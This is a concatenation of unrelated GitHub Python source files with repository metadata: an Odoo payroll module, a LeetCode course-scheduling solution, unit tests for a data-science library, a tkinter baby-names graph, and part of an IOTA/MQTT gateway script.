compute=\"get_pay_branch_check\")\n pay_by_branch_id = fields.Many2one('bsg_branches.bsg_branches', string=\"Pay By Branch ID\")\n leave_request_id = fields.Many2one('hr.leave', string=\"Leave Request\", track_visibility=True)\n details_by_salary_rule_category = fields.One2many('hr.payslip.line','slip_id',\n compute='_compute_details_by_salary_rule_category',\n string='Details by Salary Rule Category')\n\n # 
@api.multi\n def _compute_details_by_salary_rule_category(self):\n for payslip in self:\n payslip.details_by_salary_rule_category = payslip.mapped('line_ids').filtered(lambda line: line.category_id)\n\n @api.depends('leave_request_id', 'state')\n def get_pay_branch_check(self):\n for rec in self:\n rec.pay_by_branch_check = False\n if not rec.leave_request_id or rec.state != 'done':\n rec.pay_by_branch_check = True\n else:\n rec.pay_by_branch_check = False\n\n\n @api.onchange('pay_by_branch')\n def onchange_pay_by_branch(self):\n if not self.pay_by_branch:\n if self.pay_by_branch_id:\n self.pay_by_branch_id = False\n\n\n\n\n\n\n\n\n @api.model\n def create(self, vals):\n res = super(HrPayslip, self).create(vals)\n if vals.get('employee_id', False):\n res.branch_id = res.employee_id.branch_id.id\n res.job_id = res.employee_id.job_id.id\n res.department_id = res.employee_id.department_id.id\n return res\n\n def get_days_diff(self, joining_date, payslip_from_date):\n if not joining_date or not payslip_from_date:\n return 30\n if joining_date >= payslip_from_date:\n delta = (joining_date - payslip_from_date)\n else:\n delta = (payslip_from_date - joining_date)\n return delta.days\n\n \n def write(self, vals):\n res = super(HrPayslip, self).write(vals)\n if vals.get('employee_id', False):\n self.branch_id = self.employee_id.branch_id.id\n self.job_id = self.employee_id.job_id.id\n self.department_id = self.employee_id.department_id.id\n return res\n\n @api.onchange('employee_id')\n def onchange_employee_reset_category_ids(self):\n if self.employee_id:\n category_ids = self.employee_id.category_ids\n if category_ids:\n self.category_ids = [(6, 0, category_ids.ids)]\n self.employee_state = self.employee_id.employee_state\n self.salary_payment_method = self.employee_id.salary_payment_method\n self.branch_id = self.employee_id.branch_id.id or False\n self.job_id = self.employee_id.job_id.id or False\n self.department_id = self.employee_id.department_id.id or False\n else:\n self.category_ids = []\n self.branch_id = False\n self.job_id = False\n self.department_id = False\n return\n\n \n @api.depends('line_ids')\n def _compute_total_net(self):\n for rec in self:\n if rec.exists() and rec.env.context.get('eos_hr_termination') and rec.hr_termination_id and rec.type == 'eos':\n rec.update({'total_net' : rec.hr_termination_id.total_eos_amount})\n else:\n net = rec.line_ids and rec.line_ids.filtered(lambda line: line.code == 'NET').total or 0.0\n rec.total_net = net\n\n \n def set_to_paid(self):\n for rec in self:\n rec.write({'state': 'paid'})\n\n \n def compute_sheet(self):\n res = super(HrPayslip, self).compute_sheet()\n no_batch_total_update = self._context.get('no_batch_total_update', False)\n for rec in self:\n if rec.payslip_run_id and not no_batch_total_update:\n net_total = sum(rec.payslip_run_id.slip_ids.mapped('total_net'))\n rec.payslip_run_id.batch_net_total = net_total\n\n return res\n\n def get_department_parent(self, department_id):\n if not department_id.parent_id:\n return department_id\n return self.get_department_parent(department_id.parent_id)\n\n\n\n\n\n\n \n def action_payslip_done(self):\n no_compute = self._context.get('no_compute', False)\n for slip in self:\n print('.............slip...........',slip)\n analytic_account_id = False\n department_id = slip.employee_id.department_id and slip.get_department_parent(\n slip.employee_id.department_id) or False\n contract_id = slip.contract_id\n branch_id = slip.employee_id.branch_id\n fleet_vehicle_id = 
slip.employee_id.vehicle_sticker_no and self.env['fleet.vehicle'].search(\n [('taq_number', '=', slip.employee_id.vehicle_sticker_no), ('company_id', '=', slip.employee_id.company_id.id)]) or False\n if slip.type == 'holiday':\n allowance = slip\n allowance_lines = self.sudo().with_context({'leave_id': self.id})._get_payslip_lines_by_holiday(\n allowance.contract_id.ids, allowance.id)\n number = allowance.number or self.env['ir.sequence'].next_by_code('salary.slip')\n if allowance_lines:\n if allowance.line_ids:\n allowance.line_ids.unlink()\n lines = [(0,0, line) for line in allowance_lines]\n allowance.write({'line_ids': lines, 'number': number})\n else:\n if not no_compute:\n if not slip.type == 'eos':\n slip.compute_sheet()\n slip.write({'state': 'done'})\n line_ids = []\n debit_sum = 0.0\n credit_sum = 0.0\n date = slip.date or slip.date_to\n currency = slip.company_id.currency_id or slip.journal_id.company_id.currency_id\n\n name = _('Payslip of %s') % (slip.employee_id.name)\n move_dict = {\n 'narration': name,\n 'ref': slip.number,\n 'journal_id': slip.journal_id.id,\n 'date': date,\n 'move_type':'entry',\n }\n for line in slip.sudo().details_by_salary_rule_category:\n amount = currency.round(slip.credit_note and -line.total or line.total)\n if currency.is_zero(amount):\n continue\n debit_account_id = line.salary_rule_id.account_debit.id\n credit_account_id = line.salary_rule_id.account_credit.id\n\n if debit_account_id:\n if slip.type == 'holiday':\n if line.salary_rule_id.is_get_from_leave:\n debit_account_id = line.salary_rule_id.leave_debit_account_id.id\n else:\n debit_account_id = line.salary_rule_id.account_debit.id\n analytic_account_id = False\n if line.salary_rule_id.account_debit.account_type in ['income','income_other','expense','expense_direct_cost']:\n analytic_account_id = contract_id.analytic_account_id and contract_id.analytic_account_id.id or False\n print('............asdad.analytic_account_id.........',analytic_account_id)\n debit_line = (0, 0, {\n 'name': line.name,\n 'partner_id': line._get_partner_id(credit_account=False),\n 'account_id': debit_account_id,\n 'journal_id': slip.journal_id.id,\n 'date': date,\n 'debit': amount > 0.0 and amount or 0.0,\n 'credit': amount < 0.0 and -amount or 0.0,\n 'analytic_distribution': {analytic_account_id: 100},\n 'tax_line_id': line.salary_rule_id.account_tax_id.id,\n 'department_id': analytic_account_id and department_id and department_id.id or False,\n 'bsg_branches_id': analytic_account_id and branch_id and branch_id.id or False,\n 'fleet_vehicle_id': analytic_account_id and fleet_vehicle_id and fleet_vehicle_id.id or False,\n\n })\n line_ids.append(debit_line)\n debit_sum += debit_line[2]['debit'] - debit_line[2]['credit']\n\n if credit_account_id:\n if slip.type == 'holiday':\n if line.salary_rule_id.is_get_from_leave:\n credit_account_id = line.salary_rule_id.leave_credit_account_id.id\n else:\n credit_account_id = line.salary_rule_id.account_credit.id\n analytic_account_id = False\n if line.salary_rule_id.account_credit.account_type in ['income','income_other','expense','expense_direct_cost']:\n analytic_account_id = contract_id.analytic_account_id and contract_id.analytic_account_id.id or False\n print('.......dsdsdsd.....asdad.analytic_account_id.........', analytic_account_id)\n credit_line = (0, 0, {\n 'name': line.name,\n 'partner_id': line._get_partner_id(credit_account=True),\n 'account_id': credit_account_id,\n 'journal_id': slip.journal_id.id,\n 'date': date,\n 'debit': amount < 0.0 and -amount or 0.0,\n 
'credit': amount > 0.0 and amount or 0.0,\n 'analytic_distribution': {analytic_account_id: 100},\n 'tax_line_id': line.salary_rule_id.account_tax_id.id,\n 'department_id': analytic_account_id and department_id and department_id.id or False,\n 'bsg_branches_id': analytic_account_id and branch_id and branch_id.id or False,\n 'fleet_vehicle_id': analytic_account_id and fleet_vehicle_id and fleet_vehicle_id.id or False,\n })\n line_ids.append(credit_line)\n credit_sum += credit_line[2]['credit'] - credit_line[2]['debit']\n\n if currency.compare_amounts(credit_sum, debit_sum) == -1:\n acc_id = slip.journal_id.default_account_id.id\n if not acc_id:\n raise UserError(_('The Expense Journal \"%s\" has not properly configured the Credit Account!') % (\n slip.journal_id.name))\n adjust_credit = (0, 0, {\n 'name': _('Adjustment Entry'),\n 'partner_id': False,\n 'account_id': acc_id,\n 'journal_id': slip.journal_id.id,\n 'date': date,\n 'debit': 0.0,\n 'credit': currency.round(debit_sum - credit_sum),\n })\n line_ids.append(adjust_credit)\n\n elif currency.compare_amounts(debit_sum, credit_sum) == -1:\n acc_id = slip.journal_id.default_account_id.id\n if not acc_id:\n raise UserError(_('The Expense Journal \"%s\" has not properly configured the Debit Account!') % (\n slip.journal_id.name))\n adjust_debit = (0, 0, {\n 'name': _('Adjustment Entry'),\n 'partner_id': False,\n 'account_id': acc_id,\n 'journal_id': slip.journal_id.id,\n 'date': date,\n 'debit': currency.round(credit_sum - debit_sum),\n 'credit': 0.0,\n })\n line_ids.append(adjust_debit)\n move_dict['line_ids'] = line_ids\n move = self.env['account.move'].create(move_dict)\n slip.write({'move_id': move.id, 'date': date})\n move.action_post()\n return True\n\n @api.model\n def _get_payslip_lines_by_holiday(self, contract_ids, payslip_id):\n\n def _sum_salary_rule_category(localdict, category, amount):\n if category.parent_id:\n localdict = _sum_salary_rule_category(localdict, category.parent_id, amount)\n\n if category.code in localdict['categories'].dict:\n localdict['categories'].dict[category.code] += amount\n else:\n localdict['categories'].dict[category.code] = amount\n\n return localdict\n\n class BrowsableObject(object):\n def __init__(self, employee_id, dict, env):\n self.employee_id = employee_id\n self.dict = dict\n self.env = env\n\n def __getattr__(self, attr):\n return attr in self.dict and self.dict.__getitem__(attr) or 0.0\n\n class InputLine(BrowsableObject):\n \"\"\"a class that will be used into the python code, mainly for usability purposes\"\"\"\n\n def sum(self, code, from_date, to_date=None):\n if to_date is None:\n to_date = fields.Date.today()\n self.env.cr.execute(\"\"\"\n SELECT sum(amount) as sum\n FROM hr_payslip as hp, hr_payslip_input as pi\n WHERE hp.employee_id = %s AND hp.state = 'done'\n AND hp.date_from >= %s AND hp.date_to <= %s AND hp.id = pi.payslip_id AND pi.code = %s\"\"\",\n (self.employee_id, from_date, to_date, code))\n return self.env.cr.fetchone()[0] or 0.0\n\n class WorkedDays(BrowsableObject):\n \"\"\"a class that will be used into the python code, mainly for usability purposes\"\"\"\n\n def _sum(self, code, from_date, to_date=None):\n if to_date is None:\n to_date = fields.Date.today()\n self.env.cr.execute(\"\"\"\n SELECT sum(number_of_days) as number_of_days, sum(number_of_hours) as number_of_hours\n FROM hr_payslip as hp, hr_payslip_worked_days as pi\n WHERE hp.employee_id = %s AND hp.state = 'done'\n AND hp.date_from >= %s AND hp.date_to <= %s AND hp.id = pi.payslip_id AND pi.code = 
%s\"\"\",\n (self.employee_id, from_date, to_date, code))\n return self.env.cr.fetchone()\n\n def sum(self, code, from_date, to_date=None):\n res = self._sum(code, from_date, to_date)\n return res and res[0] or 0.0\n\n def sum_hours(self, code, from_date, to_date=None):\n res = self._sum(code, from_date, to_date)\n return res and res[1] or 0.0\n\n class Payslips(BrowsableObject):\n \"\"\"a class that will be used into the python code, mainly for usability purposes\"\"\"\n\n def sum(self, code, from_date, to_date=None):\n if to_date is None:\n to_date = fields.Date.today()\n self.env.cr.execute(\"\"\"SELECT sum(case when hp.credit_note = False then (pl.total) else (-pl.total) end)\n FROM hr_payslip as hp, hr_payslip_line as pl\n WHERE hp.employee_id = %s AND hp.state = 'done'\n AND hp.date_from >= %s AND hp.date_to <= %s AND hp.id = pl.slip_id AND pl.code = %s\"\"\",\n (self.employee_id, from_date, to_date, code))\n res = self.env.cr.fetchone()\n return res and res[0] or 0.0\n\n # we keep a dict with the result because a value can be overwritten by another rule with the same code\n result_dict = {}\n rules_dict = {}\n worked_days_dict = {}\n inputs_dict = {}\n blacklist = []\n payslip = self.env['hr.payslip'].browse(payslip_id)\n for worked_days_line in payslip.worked_days_line_ids:\n worked_days_dict[worked_days_line.code] = worked_days_line\n for input_line in payslip.input_line_ids:\n inputs_dict[input_line.code] = input_line\n\n categories = BrowsableObject(payslip.employee_id.id, {}, self.env)\n inputs = InputLine(payslip.employee_id.id, inputs_dict, self.env)\n worked_days = WorkedDays(payslip.employee_id.id, worked_days_dict, self.env)\n payslips = Payslips(payslip.employee_id.id, payslip, self.env)\n rules = BrowsableObject(payslip.employee_id.id, rules_dict, self.env)\n\n baselocaldict = {'categories': categories, 'rules': rules, 'payslip': payslips, 'worked_days': worked_days,\n 'inputs': inputs}\n # get the ids of the structures on the contracts and their parent id as well\n contracts = self.env['hr.contract'].browse(contract_ids)\n if len(contracts) == 1 and payslip.struct_id:\n structure_ids = list(set(payslip.struct_id._get_parent_structure().ids))\n else:\n structure_ids = contracts.get_all_structures()\n # get the rules of the structure and thier children\n rule_ids = self.env['hr.payroll.structure'].browse(structure_ids).get_all_rules()\n # run the rules by sequence\n sorted_rule_ids = [id for id, sequence in sorted(rule_ids, key=lambda x: x[1])]\n sorted_rules = self.env['hr.salary.rule'].browse(sorted_rule_ids)\n\n sorted_rules = sorted_rules.filtered(lambda l: l.in_holiday)\n\n for contract in contracts:\n employee = contract.employee_id\n localdict = dict(baselocaldict, employee=employee, contract=contract)\n for rule in sorted_rules:\n key = rule.code + '-' + str(contract.id)\n localdict['result'] = None\n localdict['result_qty'] = 1.0\n localdict['result_rate'] = 100\n # check if the rule can be applied\n if rule._satisfy_condition(localdict) and rule.id not in blacklist:\n # compute the amount of the rule\n amount, qty, rate = rule._compute_rule(localdict)\n # check if there is already a rule computed with that code\n previous_amount = rule.code in localdict and localdict[rule.code] or 0.0\n if rule.per_day and worked_days.PAID100:\n amount = (amount / WORK_DAY_PER_MONTH) * worked_days.PAID100.number_of_days\n # set/overwrite the amount computed for this rule in the localdict\n tot_rule = amount * qty * rate / 100.0\n localdict[rule.code] = tot_rule\n 
rules_dict[rule.code] = rule\n # sum the amount for its salary category\n localdict = _sum_salary_rule_category(localdict, rule.category_id, tot_rule - previous_amount)\n # create/overwrite the rule in the temporary results\n result_dict[key] = {\n 'salary_rule_id': rule.id,\n 'contract_id': contract.id,\n 'name': rule.name,\n 'code': rule.code,\n 'category_id': rule.category_id.id,\n 'sequence': rule.sequence,\n 'appears_on_payslip': rule.appears_on_payslip,\n 'condition_select': rule.condition_select,\n 'condition_python': rule.condition_python,\n 'condition_range': rule.condition_range,\n 'condition_range_min': rule.condition_range_min,\n 'condition_range_max': rule.condition_range_max,\n 'amount_select': rule.amount_select,\n 'amount_fix': rule.amount_fix,\n 'amount_python_compute': rule.amount_python_compute,\n 'amount_percentage': rule.amount_percentage,\n 'amount_percentage_base': rule.amount_percentage_base,\n 'register_id': rule.register_id.id,\n 'amount': amount,\n 'employee_id': contract.employee_id.id,\n 'quantity': qty,\n 'rate': rate,\n }\n else:\n # blacklist this rule and its children\n blacklist += [id for id, seq in rule._recursive_search_of_rules()]\n\n return list(result_dict.values())\n\n\nclass HrPayslipRun(models.Model):\n _inherit = 'hr.payslip.run'\n\n state = fields.Selection([\n ('draft', 'Draft'),\n ('done', 'Done'),\n ('paid', 'Paid'),\n ('close', 'Close'),\n ], string='Status', index=True, readonly=True, copy=False, default='draft')\n batch_net_total = fields.Float('Batch Total NET', readonly=True)\n description = fields.Text('Description', readonly=True, states={'draft': [('readonly', False)]})\n credit_note = fields.Boolean(\n string='Credit Note',\n states={'draft': [('readonly', False)]},\n help=\"Indicates this payslip has a refund of another\")\n\n \n def _compute_attachment_number(self):\n for payslip in self:\n payslip.attachment_number = self.env['ir.attachment'].search_count(\n [('res_model', '=', 'hr.payslip.run'), ('res_id', '=', payslip.id)])\n\n \n def open_attach_wizard(self):\n view_id = self.env.ref('bsg_hr_payroll.view_attachment_payslip_batch_form').id\n default_name = \"مرفقات دفعة\" + \" \" + str(self.name)\n\n return {\n 'name': _('Attachments'),\n 'res_model': 'ir.attachment',\n 'view_type': 'form',\n 'context': \"{'default_name': '%s','default_res_model': '%s','default_res_id': %d}\" % (\n default_name, self._name, self.id),\n 'type': 'ir.actions.act_window',\n 'views': [(view_id, 'form')],\n 'view_id': view_id,\n 'target': 'new',\n }\n\n \n def action_get_attachment_view(self):\n self.ensure_one()\n res = self.env['ir.actions.act_window']._for_xml_id('bsg_hr_payroll.action_attachment')\n return res\n\n attachment_number = fields.Integer('Number of Attachments', compute='_compute_attachment_number')\n\n \n def confirm_payslip_run(self):\n for rec in self:\n if rec.state != 'draft':\n ValidationError(_(\"You can only confirm batches in 'Draft' state!\"))\n for slip in rec.slip_ids:\n if slip.state == 'draft':\n slip.with_context({'no_compute': True}).action_payslip_done()\n return self.write({'state': 'done'})\n\n \n def compute_payslip_run(self):\n for rec in self:\n if not rec.slip_ids:\n ValidationError(\"Please generate payslips first!\")\n if rec.state != 'draft':\n ValidationError(_(\"You may only compute batches in 'Draft' state!\"))\n for slip in rec.slip_ids:\n if slip.state == 'draft':\n slip.with_context({'no_batch_total_update': True}).compute_sheet()\n net_total = sum(rec.slip_ids.mapped('total_net'))\n rec.batch_net_total = 
net_total\n return True\n\n \n def unlink(self):\n for rec in self:\n if rec.state == 'done':\n raise ValidationError(_(\"You can not delete confimed batches!\"))\n if rec.slip_ids:\n if 'done' in rec.slip_ids.mapped('state'):\n raise ValidationError(_(\"You can't delete a batch that has confirmed payslips!\"))\n else:\n rec.slip_ids.unlink()\n super(HrPayslipRun, self).unlink()\n return True\n\n # @api.constrains('slip_ids')\n # def _trigger_slip_ids(self):\n # for rec in self:\n # rec.sudo().compute_payslip_run()\n\n\nclass AccountMove(models.Model):\n _inherit = \"account.move\"\n\n payslip_run_id = fields.Many2one('hr.payslip', string='Payslip Batch', copy=False, help=\"Payslip Expense\",\n readonly=True)\n\n\nclass AccountMoveLine(models.Model):\n _inherit = \"account.move.line\"\n\n payslip_id = fields.Many2one('hr.payslip', string='Payslip', copy=False, help=\"Payslip Expense\", readonly=True)\n\n def reconcile(self):\n res = super().reconcile()\n account_move_ids = [l.move_id.id for l in self]\n if account_move_ids:\n payslip = self.env['hr.payslip'].sudo().with_context(force_company=self.env.user.company_id.id,\n company_id=self.env.user.company_id.id).search([\n ('move_id', 'in', account_move_ids), ('state', '=', 'done')\n ])\n payslip.set_to_paid()\n return res\n","repo_name":"tabishturabi/S_V_16_temp_v1","sub_path":"bsg_hr_payroll/models/hr_paysilp.py","file_name":"hr_paysilp.py","file_ext":"py","file_size_in_byte":28741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"29037832600","text":"class Solution:\n def minimumSemesters(self, n: int, relations: List[List[int]]) -> int:\n in_degree = [0]*(n+1)\n outdegree_map = collections.defaultdict(list)\n \n for prev, nextCourse in relations:\n outdegree_map[prev].append(nextCourse)\n in_degree[nextCourse] += 1\n \n #print(outdegree_map, in_degree)\n q = deque()\n for i, v in enumerate(in_degree):\n if v == 0 and i > 0:\n q.append((i, 1))\n\n min_sem = -1\n course_taken = 0\n while q:\n curr_class, curr_sem = q.popleft()\n course_taken += 1\n min_sem = max(curr_sem, min_sem)\n for i in outdegree_map[curr_class]:\n in_degree[i] -= 1\n if in_degree[i] == 0:\n q.append((i, curr_sem+1))\n \n \n return min_sem if course_taken == n else -1\n ","repo_name":"Hangpanbee/LeetcodeDump","sub_path":"1136-parallel-courses/1136-parallel-courses.py","file_name":"1136-parallel-courses.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"10048291455","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n:Authors: Tal Peretz\n:Date: 12/8/2016\n:TL;DR: this module is responsible for testing transformations module\n\"\"\"\n\nimport os\nimport unittest\n\nimport numpy as np\n\nfrom pyds import transformations, constants\nfrom tests import data_generators\n\n\nclass TransformationsTestCase(unittest.TestCase):\n logger = None\n is_warnings_traced = False\n\n def setUp(self):\n import traceback\n import warnings\n import sys\n import logging.config\n\n # setting log configuration\n log_conf_path = os.path.abspath(constants.LOGGER_CONFIGURATION_RELATIVE_PATH)\n logging.config.fileConfig(log_conf_path)\n self.logger = logging.getLogger(__name__)\n\n def warn_with_traceback(message, category, filename, lineno, file=None, line=None):\n traceback.print_stack()\n\n log = file if hasattr(file, 'write') else sys.stderr\n log.write(warnings.formatwarning(message, category, filename, lineno, line))\n\n if 
self.is_warnings_traced:\n warnings.showwarning = warn_with_traceback\n\n def test_discretize(self):\n gen_df = data_generators.generate_random_data(100, 5)\n equal_width_num_df, col_to_width_edges, equal_depth_num_df, col_to_depth_edges = transformations.discretize(\n gen_df)\n equal_width_num_df_with_predefined_bins, _, equal_depth_num_df_with_predefined_bins, _ = transformations.discretize(\n gen_df, col_to_width_edges, col_to_depth_edges)\n\n # check that equal_width_num_df and equal_depth_num_df has optimal num of bins\n for col_name in gen_df:\n self.assertEqual(len(equal_width_num_df[\"equal_w_%s\" % col_name].unique()),\n transformations._calc_optimal_num_of_bins(gen_df[col_name]))\n self.assertEqual(len(equal_depth_num_df[\"equal_d_%s\" % col_name].unique()),\n transformations._calc_optimal_num_of_bins(gen_df[col_name]))\n self.assertTrue(equal_width_num_df_with_predefined_bins.equals(equal_width_num_df))\n self.assertTrue(equal_depth_num_df_with_predefined_bins.equals(equal_depth_num_df))\n\n def test_preprocess_train_columns(self):\n hr_df = data_generators.get_hr_dataset()\n transformed_df, train_transformations = transformations.preprocess_train_columns(hr_df)\n self.assertEqual(len(hr_df.select_dtypes(include=[np.number])),\n len(transformed_df.select_dtypes(include=[np.number]))) # num of num cols hasn't changed\n self.assertGreaterEqual(len(hr_df.select_dtypes(include=['category'])),\n len(transformed_df.select_dtypes(include=['category']))) # num of cat cols is greater or equal\n\n def test_preprocess_test_columns(self):\n # run preprocess_train_columns and preprocess_test_columns on same raw data and check if the returned dataframes\n # are equal\n hr_df = data_generators.get_hr_dataset()\n transformed_train_df, train_transformations = transformations.preprocess_train_columns(hr_df)\n transformed_test_df = transformations.preprocess_test_columns(hr_df, train_transformations)\n self.assertTrue(transformed_train_df.equals(transformed_test_df))\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"talperetz/pyds","sub_path":"tests/transformations_tests.py","file_name":"transformations_tests.py","file_ext":"py","file_size_in_byte":3300,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"} +{"seq_id":"15111950233","text":"\"\"\"\nSC101 Baby Names Project\nAdapted from Nick Parlante's Baby Names assignment by\nJerry Liao.\n\nYOUR DESCRIPTION HERE\n\"\"\"\n\nimport tkinter\nimport babynames\nimport babygraphicsgui as gui\n\nFILENAMES = [\n 'data/full/baby-1900.txt', 'data/full/baby-1910.txt',\n 'data/full/baby-1920.txt', 'data/full/baby-1930.txt',\n 'data/full/baby-1940.txt', 'data/full/baby-1950.txt',\n 'data/full/baby-1960.txt', 'data/full/baby-1970.txt',\n 'data/full/baby-1980.txt', 'data/full/baby-1990.txt',\n 'data/full/baby-2000.txt', 'data/full/baby-2010.txt'\n]\nCANVAS_WIDTH = 1000\nCANVAS_HEIGHT = 600\nYEARS = [1900, 1910, 1920, 1930, 1940, 1950, 1960, 1970, 1980, 1990, 2000, 2010]\nGRAPH_MARGIN_SIZE = 20\nCOLORS = ['red', 'purple', 'green', 'blue']\nTEXT_DX = 2\nLINE_WIDTH = 2\nMAX_RANK = 1000\n\n\ndef get_x_coordinate(width, year_index):\n \"\"\"\n Given the width of the canvas and the index of the current year\n in the YEARS list, returns the x coordinate of the vertical\n line associated with that year.\n\n Input:\n width (int): The width of the canvas\n year_index (int): The index of the current year in the YEARS list\n Returns:\n x_coordinate (int): The x coordinate of the vertical line associated\n with the 
specified year.\n \"\"\"\n x_coordinate = int(GRAPH_MARGIN_SIZE + year_index * (width - 2 * GRAPH_MARGIN_SIZE) / len(YEARS))\n return x_coordinate\n\n\ndef draw_fixed_lines(canvas):\n \"\"\"\n Erases all existing information on the given canvas and then\n draws the fixed background lines on it.\n\n Input:\n canvas (Tkinter Canvas): The canvas on which we are drawing.\n\n Returns:\n This function does not return any value.\n \"\"\"\n canvas.delete('all') # delete all existing lines from the canvas\n\n # Write your code below this line\n canvas.create_line(GRAPH_MARGIN_SIZE, GRAPH_MARGIN_SIZE, CANVAS_WIDTH - GRAPH_MARGIN_SIZE, GRAPH_MARGIN_SIZE,\n width=LINE_WIDTH)\n canvas.create_line(GRAPH_MARGIN_SIZE, CANVAS_HEIGHT - GRAPH_MARGIN_SIZE,\n CANVAS_WIDTH - GRAPH_MARGIN_SIZE, CANVAS_HEIGHT - GRAPH_MARGIN_SIZE, width=LINE_WIDTH)\n for i in range(len(YEARS)):\n year = YEARS[i]\n x_coordinate = get_x_coordinate(CANVAS_WIDTH, i)\n canvas.create_line(x_coordinate, 0, x_coordinate, CANVAS_HEIGHT, width=LINE_WIDTH)\n canvas.create_text(x_coordinate + TEXT_DX, CANVAS_HEIGHT - GRAPH_MARGIN_SIZE, text=year, anchor=tkinter.NW,\n font='courier, 16', fill='navy')\n #################################\n\n\ndef draw_names(canvas, name_data, lookup_names):\n \"\"\"\n Given a dict of baby name data and a list of name, plots\n the historical trend of those names onto the canvas.\n\n Input:\n canvas (Tkinter Canvas): The canvas on which we are drawing.\n name_data (dict): Dictionary holding baby name data\n lookup_names (List[str]): A list of names whose data you want to plot\n\n Returns:\n This function does not return any value.\n \"\"\"\n draw_fixed_lines(canvas) # draw the fixed background grid\n\n # Write your code below this line\n for i in range(len(lookup_names)):\n name = lookup_names[i]\n name_color = COLORS[i % len(COLORS)]\n if name in name_data:\n year = str(YEARS[0])\n if year in name_data[name]:\n rank = int(name_data[name][year])\n x1 = get_x_coordinate(CANVAS_WIDTH, 0)\n y1 = GRAPH_MARGIN_SIZE + ((CANVAS_HEIGHT - 2 * GRAPH_MARGIN_SIZE) / 1000) * rank\n canvas.create_text(x1 + TEXT_DX, y1, text=f'{name} {rank}', anchor=tkinter.SW, font='times, 12',\n fill=name_color)\n else:\n x1 = get_x_coordinate(CANVAS_WIDTH, 0)\n y1 = CANVAS_HEIGHT - GRAPH_MARGIN_SIZE\n canvas.create_text(x1 + TEXT_DX, y1, text=f'{name} *', anchor=tkinter.SW, font='times, 12',\n fill=name_color)\n for j in range(len(YEARS) - 1):\n year = str(YEARS[j + 1])\n if year in name_data[name]:\n rank = int(name_data[name][year])\n x2 = get_x_coordinate(CANVAS_WIDTH, j + 1)\n y2 = GRAPH_MARGIN_SIZE + ((CANVAS_HEIGHT - 2 * GRAPH_MARGIN_SIZE) / 1000) * rank\n canvas.create_text(x2 + TEXT_DX, y2, text=f'{name} {rank}', anchor=tkinter.SW, font='times, 12',\n fill=name_color)\n else:\n x2 = get_x_coordinate(CANVAS_WIDTH, j + 1)\n y2 = CANVAS_HEIGHT - GRAPH_MARGIN_SIZE\n canvas.create_text(x2 + TEXT_DX, y2, text=f'{name} *', anchor=tkinter.SW, font='times, 12',\n fill=name_color)\n canvas.create_line(x1, y1, x2, y2, width=LINE_WIDTH, fill=name_color)\n x1 = x2\n y1 = y2\n #################################\n\n\n# main() code is provided, feel free to read through it but DO NOT MODIFY\ndef main():\n # Load data\n name_data = babynames.read_files(FILENAMES)\n\n # Create the window and the canvas\n top = tkinter.Tk()\n top.wm_title('Baby Names')\n canvas = gui.make_gui(top, CANVAS_WIDTH, CANVAS_HEIGHT, name_data, draw_names, babynames.search_names)\n\n # Call draw_fixed_lines() once at startup so we have the lines\n # even before the user types 
anything.\n draw_fixed_lines(canvas)\n\n # This line starts the graphical loop that is responsible for\n # processing user interactions and plotting data\n top.mainloop()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"yutaotseng/sc-projects","sub_path":"stanCode_Projects/name_searching_system/babygraphics.py","file_name":"babygraphics.py","file_ext":"py","file_size_in_byte":5713,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"5064119574","text":"#=======================================================================\n# IOTA Raspberry Pi Gateway\n#\n# This project aims to give an easy to use command for other machine to \n# interact with IOTA Tangle. \n#\n# This program can be used to give signature to the data. This method is\n# helpful to differentiate message in the same tag index by using\n# ECDSA signature.\n#\n# More information : \n# https://github.com/SuryaAssistant/iota-raspberrypi-gateway\n#\n# Apache-2.0 License\n#=======================================================================\n\n# Gateway Properties\nfrom config.config import *\nimport iota_client\n\n# ECC Digital Signature Properties\nfrom ellipticcurve import Ecdsa, PrivateKey, PublicKey, Signature\nfrom ellipticcurve.utils.file import File\n\n# Other Properties\nimport subprocess\nimport json\nimport time\nimport os\n\nclient_data = \"\"\nsend_addr = \"\"\ntangle_msg_id = \"\"\n\n#=======================================================================\n# Function to Upload Data to IOTA Tangle\n# Parameter:\n# - input_data : Series of data to be uploaded\n# - index_msg : tag index in IOTA Tangle. For easy search by tag index\n#=======================================================================\ndef upload(data, index_msg):\n timestamp = str(int(time.time()))\n encoded_data = data.encode()\n message = ('\"message\":' + '{\"timestamp\":' + timestamp + \n ',\"data\":' + data + '}')\n \n # Read private key for signature\n privateKey = PrivateKey.fromPem(File.read(\".ecc/privateKey.pem\"))\n # Create public key \n publicKey = privateKey.publicKey()\n # Create Signature\n signature = Ecdsa.sign(message, privateKey).toBase64()\n # Create JSON like format\n payload = ('{' + message + \n ',\"publicKey\":\"' + publicKey.toCompressed() + \n '\",\"signature\":\"' + signature + '\"}')\n payload_int = payload.encode(\"utf8\")\n\n # upload to tangle\n tangle_return = client.message(index=index_msg, data=payload_int)\n global tangle_msg_id\n tangle_msg_id = tangle_return['message_id']\n \n#=======================================================================\n# Function to relay data from IOTA Tangle to Subscriber via MQTT\n# Parameter:\n# - msg : message from IOTA Tangle\n# - send_topic : client subscribed topic\n#=======================================================================\ndef send_mqtt(msg, send_topic):\n shell_script = ('mosquitto_pub -h ' + mqtt_addr + ' -t \"' + \n gateway_name + '/' +\n send_topic + '\" -m \"' +\n msg + '\"')\n \n # see what send\n print('OUT ==> ' + msg)\n # call shell \n os.system(shell_script)\n\n#=======================================================================\n# Function to create and save ECDSA private key\n# Parameter: None\n#=======================================================================\ndef ECDSA_begin():\n # ECDSA CONFIG\n #if folder is not exist, create folder\n folder_path = '.ecc'\n if os.path.exists(folder_path) == False:\n os.mkdir(folder_path)\n\n #if privateKey is not exist, create pem 
